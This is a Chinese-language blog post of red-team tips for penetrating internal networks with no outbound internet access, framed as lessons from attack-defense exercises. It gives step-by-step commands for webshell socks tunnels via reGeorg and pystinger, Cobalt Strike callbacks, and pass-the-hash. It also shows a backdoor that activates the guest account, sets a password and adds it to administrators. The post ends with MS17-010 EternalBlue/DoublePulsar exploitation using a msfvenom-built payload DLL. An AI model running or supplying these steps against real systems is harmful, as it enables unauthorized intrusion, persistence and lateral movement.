內(nèi)網(wǎng)滲透-不出網(wǎng)滲透技巧

前言

最近參加了幾場攻防演練,遇到幾個(gè)內(nèi)網(wǎng)環(huán)境都不通外網(wǎng),整理下用到的幾種不出網(wǎng)內(nèi)網(wǎng)滲透技巧。

socks隧道搭建

常用工具:reGeorg,Proxifier
用的比較多的一個(gè)隧道代理工具
1、上傳對應(yīng)語言的腳本到目標(biāo)服務(wù)器的網(wǎng)站目錄下


2、通過瀏覽器訪問上傳的腳本文件,顯示如下表示成功。

3、本地運(yùn)行reGeorgSocksProxy.py,-p為指定隧道的端口,-u為剛剛上傳的tunnel文件地址。

python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php

4、打開Proxifier,配置ip和端口



5、成功把本機(jī)帶入內(nèi)網(wǎng)。


cs上線

cs逐漸成為內(nèi)網(wǎng)滲透中使用最多的工具,在目標(biāo)不通外網(wǎng)的情況下,無法直接與公網(wǎng)的cs服務(wù)端建立連接。

pystinger

下載地址:https://github.com/FunnyWolf/pystinger
通過webshell實(shí)現(xiàn)內(nèi)網(wǎng)SOCK4代理,端口映射可以使目標(biāo)不出網(wǎng)情況下在cs上線。


直接使用cs多主機(jī)上線方法。
首先上傳對應(yīng)語言的腳本到網(wǎng)站目錄下。

將stinger_server.exe上傳到目標(biāo)服務(wù)器
創(chuàng)建stinger_server.vbs文件,示例如下:

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c D:\XXXXX\stinger_server.exe 0.0.0.0",vbhide

執(zhí)行vbs腳本,啟動(dòng)服務(wù)端。



或者直接執(zhí)行exe

start stinger_server.exe 0.0.0.0

把stinger_client上傳到公網(wǎng)vps,-w指定proxy的url地址運(yùn)行。

chmod 777 stinger_client
./stinger_client -w http://x.x.x.x/proxy.jsp -l 0.0.0.0 -p 60000

cs新建監(jiān)聽器,設(shè)置為目標(biāo)機(jī)器的內(nèi)網(wǎng)ip,端口默認(rèn)60020。




根據(jù)新建的監(jiān)聽器,制作免殺木馬,cs成功上線。



抓取上線的主機(jī)對密。

對內(nèi)網(wǎng)其它主機(jī)進(jìn)行pth攻擊,選擇剛才建立的監(jiān)聽器。

目標(biāo)主機(jī)成功上線。



坑點(diǎn):使用過程中cs會(huì)話可能假死掉,需要把stinger_server.exe進(jìn)程結(jié)束掉,然后重新啟動(dòng)。

在目標(biāo)內(nèi)網(wǎng)搭建cs服務(wù)端

如果拿下了目標(biāo)主機(jī)的管理員權(quán)限,可以激活guest用戶,建立基于http的socks隧道,登錄遠(yuǎn)程桌面,在目標(biāo)內(nèi)網(wǎng)搭建cs服務(wù)端。
缺點(diǎn):被發(fā)現(xiàn)概率上升;需要安裝java環(huán)境;基于web的socks隧道速度很慢,心態(tài)容易蹦。
首先激活guest用戶

net user guest   /active:yes
net user guest   1q2w3e4r@
net localgroup   administrators  guest   /add

登錄guest用戶,查看目標(biāo)是否存在java運(yùn)行環(huán)境,不存在的話上傳安裝包安裝。



上傳cs4.0到目標(biāo)服務(wù)器。



運(yùn)行服務(wù)端 
teamserver.bat x.x.x.x 1q2w3e4r

點(diǎn)擊cs.bat運(yùn)行客戶端




然后就可以直接在內(nèi)網(wǎng)操作cs了。

ms17010橫向利用

內(nèi)網(wǎng)滲透中常用的攻擊手段,隨著補(bǔ)丁和殺軟的普及,能利用的場景越來越少,而且容易造成目標(biāo)藍(lán)屏,影響業(yè)務(wù),所以謹(jǐn)慎使用。
之前的利用都是在通外網(wǎng)下情況下利用msf攻擊。
本次在目標(biāo)不出網(wǎng)的情況下進(jìn)行利用。

方程式漏洞利用工具

首先使用pystinger多主機(jī)模式使內(nèi)網(wǎng)主機(jī)在cs上線,生成對應(yīng)的內(nèi)網(wǎng)監(jiān)聽器。



生成對應(yīng)監(jiān)聽器的bin文件。



使用msf把cs生成的bin文件轉(zhuǎn)化為方程式利用工具可以使用的dll文件。 
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll

把原來的x64.dll文件替換掉,把工具上傳到目標(biāo)主機(jī)上。
設(shè)置targetip為存在漏洞的主機(jī)ip,設(shè)置系統(tǒng)類型,點(diǎn)擊attack執(zhí)行利用工具,利用成功返回success。



選擇doublepulsar模塊,配置ip選擇位數(shù),默認(rèn)加載dll,點(diǎn)擊attack在攻擊主機(jī)執(zhí)行剛剛生成的x64.dll文件。



目標(biāo)在cs上線成功。

cs永恒之藍(lán)利用插件

下載地址:https://github.com/phink-team/Cobaltstrike-MS17-010
cs安裝下載的插件,導(dǎo)入aggressor.cna文件。
使用pystinger多主機(jī)模式使內(nèi)網(wǎng)主機(jī)在cs上線,生成對應(yīng)的內(nèi)網(wǎng)監(jiān)聽器test。


內(nèi)網(wǎng)主機(jī)上線后,右鍵使用ms17-010攻擊插件。

ip配置為存在漏洞的主機(jī)ip,監(jiān)聽器選擇test,次數(shù)更改為1次,降低藍(lán)屏風(fēng)險(xiǎn)。

成功通過ms17-010攻擊其它主機(jī),cs上線成功。

總結(jié)

本次列舉了最近實(shí)戰(zhàn)用到的幾個(gè)小技巧,技術(shù)含量不高,希望能幫到大家。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容